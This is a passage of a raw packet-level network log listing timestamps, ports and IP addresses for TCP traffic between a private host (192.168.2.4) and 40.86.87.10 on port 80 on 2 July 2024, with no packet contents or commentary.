Jul 2, 2024 07:31:11.038728952 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:11.038739920 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:11.038741112 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:11.038753033 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:11.038767099 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:11.038769007 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:11.038779020 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:11.038805962 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:11.038825989 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:11.038974047 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:11.039019108 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:11.039019108 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:11.039031029 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:11.039057970 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:11.039077044 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:11.039251089 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:11.039263010 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:11.039282084 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:11.039293051 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:11.039294004 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:11.039303064 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:11.039304972 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:11.039316893 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:11.039324045 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:11.039328098 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:11.039333105 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:11.039339066 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:11.039350986 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:11.039356947 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:11.039364100 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:11.039374113 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:11.039386034 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:11.039387941 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:11.039397955 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:11.039397955 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:11.039427042 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:11.039434910 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:11.039927006 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:11.039942980 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:11.039956093 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:11.039967060 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:11.039973021 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:11.039982080 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:11.039983034 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:11.039992094 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:11.040008068 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:11.040031910 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:11.040066957 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:11.040112019 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:11.040121078 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:11.040133953 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:11.040158987 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:11.040178061 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:11.086766958 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:11.092106104 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:11.482508898 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:11.482590914 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:11.482666016 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:11.482677937 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:11.482688904 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:11.482700109 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:11.482709885 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:11.482712030 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:11.482723951 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:11.482733965 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:11.482772112 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:11.482806921 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:11.482817888 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:11.482829094 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:11.482846975 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:11.482873917 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:11.599402905 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:11.599462032 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:11.599595070 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:11.599606991 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:11.599617958 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:11.599636078 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:11.599642992 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:11.599648952 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:11.599658966 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:11.599661112 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:11.599669933 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:11.599682093 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:11.599705935 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:11.599723101 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:11.599877119 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:11.599889040 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:11.599917889 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:11.599935055 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:11.599987030 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:11.600024939 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:11.600131035 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:11.600141048 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:11.600152016 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:11.600162029 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:11.600172043 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:11.600178957 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:11.600187063 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:11.600193024 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:11.600203037 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:11.600223064 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:11.600254059 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:11.600254059 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:11.600393057 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:11.600444078 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:11.600518942 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:11.600531101 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:11.600559950 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:11.600574970 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:11.600600958 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:11.600610971 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:11.600622892 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:11.600632906 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:11.600661039 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:11.718957901 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:11.719017982 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:11.719153881 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:11.719165087 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:11.719176054 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:11.719187975 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:11.719197035 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:11.719207048 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:11.719217062 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:11.719218969 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:11.719229937 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:11.719240904 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:11.719249964 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:11.719253063 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:11.719264030 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:11.719269037 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:11.719286919 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:11.719300985 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:11.719460011 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:11.719470978 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:11.719482899 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:11.719506025 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:11.719516039 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:11.719706059 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:11.719717026 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:11.719727993 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:11.719741106 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:11.719748974 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:11.719752073 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:11.719763041 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:11.719773054 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:11.719780922 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:11.719784975 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:11.719795942 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:11.719799042 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:11.719806910 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:11.719813108 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:11.719856024 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:11.720276117 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:11.720288992 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:11.720300913 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:11.720312119 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:11.720323086 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:11.720325947 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:11.720335007 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:11.720341921 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:11.720345974 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:11.720356941 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:11.720369101 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:11.720376015 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:11.720380068 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:11.720393896 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:11.720400095 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:11.720417023 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:11.720437050 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:11.720880032 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:11.720890045 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:11.720901012 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:11.720911980 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:11.720923901 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:11.720930099 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:11.720933914 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:11.720940113 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:11.720946074 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:11.720957041 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:11.720968008 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:11.720978022 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:11.720988989 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:11.720993042 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:11.720993042 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:11.721000910 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:11.721009970 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:11.721013069 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:11.721024990 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:11.721035004 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:11.721040964 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:11.721045971 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:11.721048117 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:11.721080065 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:11.838148117 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:11.838171959 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:11.838182926 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:11.838211060 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:11.838258028 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:11.838330030 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:11.838339090 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:11.838350058 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:11.838371038 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:11.838391066 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:11.838393927 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:11.838435888 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:11.838534117 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:11.838542938 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:11.838551998 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:11.838562012 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:11.838572025 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:11.838578939 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:11.838582039 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:11.838592052 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:11.838620901 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:11.838768005 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:11.838783026 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:11.838810921 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:11.838833094 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:11.838913918 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:11.838926077 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:11.838936090 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:11.838947058 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:11.838952065 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:11.838956118 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:11.838965893 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:11.838973999 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:11.838975906 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:11.838984966 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:11.838994980 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:11.838996887 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:11.839013100 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:11.839030027 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:11.839360952 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:11.839373112 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:11.839385986 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:11.839396000 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:11.839413881 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:11.839413881 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:11.839436054 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:11.839508057 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:11.839519024 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:11.839529991 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:11.839549065 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:11.839562893 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:11.839564085 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:11.839576006 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:11.839586020 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:11.839596987 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:11.839603901 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:11.839632034 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:11.840023994 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:11.840034962 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:11.840044975 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:11.840055943 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:11.840065956 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:11.840081930 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:11.840085983 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:11.840097904 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:11.840099096 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:11.840107918 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:11.840120077 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:11.840121984 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:11.840130091 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:11.840141058 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:11.840148926 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:11.840152025 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:11.840181112 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:11.840210915 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:11.840730906 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:11.840742111 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:11.840753078 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:11.840769053 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:11.840780973 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:11.840784073 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:11.840791941 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:11.840802908 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:11.840810061 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:11.840812922 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:11.840822935 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:11.840832949 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:11.840838909 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:11.840843916 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:11.840854883 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:11.840859890 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:11.840866089 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:11.840876102 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:11.840878010 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:11.840888977 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:11.840899944 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:11.840914965 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:11.840918064 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:11.840918064 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:11.840928078 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:11.840939999 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:11.840966940 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:11.841730118 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:11.841742992 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:11.841752052 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:11.841763973 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:11.841773987 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:11.841784954 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:11.841789007 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:11.841797113 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:11.841806889 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:11.841810942 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:11.841818094 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:11.841829062 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:11.841839075 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:11.841840029 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:11.841850996 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:11.841854095 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:11.841861963 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:11.841872931 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:11.841873884 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:11.841882944 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:11.841892958 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:11.841895103 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:11.841922045 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:11.841948986 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:11.928702116 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:11.928767920 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:11.958045006 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:11.958080053 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:11.958091021 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:11.958108902 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:11.958131075 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:11.958131075 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:11.958177090 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:11.958204985 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:11.958247900 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:11.958249092 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:11.958261013 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:11.958287954 CEST	49730	80	192.168.2.4	40.86.87.10
